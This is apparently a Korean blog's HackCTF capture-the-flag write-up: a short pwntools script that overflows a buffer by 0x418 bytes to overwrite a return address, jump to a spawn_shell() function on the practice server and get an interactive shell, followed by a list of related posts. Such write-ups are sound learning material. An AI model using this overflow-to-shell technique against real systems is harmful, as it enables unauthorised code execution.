from pwn import *
p = remote('ctf.j0n9hyun.xyz', 3015)
context.log_level = "debug"
p.recv()
payload = 'a' * 0x418 + p64(0x400897)
p.sendline(payload)
p.interactive()
getenv() 함수에서 bof 터뜨려서 spawn_shell()함수를 실행시킨다.
'CTF write-up > hackctf' 카테고리의 다른 글
| [hackctf] you are silver (0) | 2019.07.15 |
|---|---|
| [hackctf]ROP (0) | 2019.07.15 |
| [hackctf] uaf (0) | 2019.07.15 |
| [hackctf]RTL-Core (0) | 2019.07.15 |
| [hack-ctf]poet (0) | 2019.07.15 |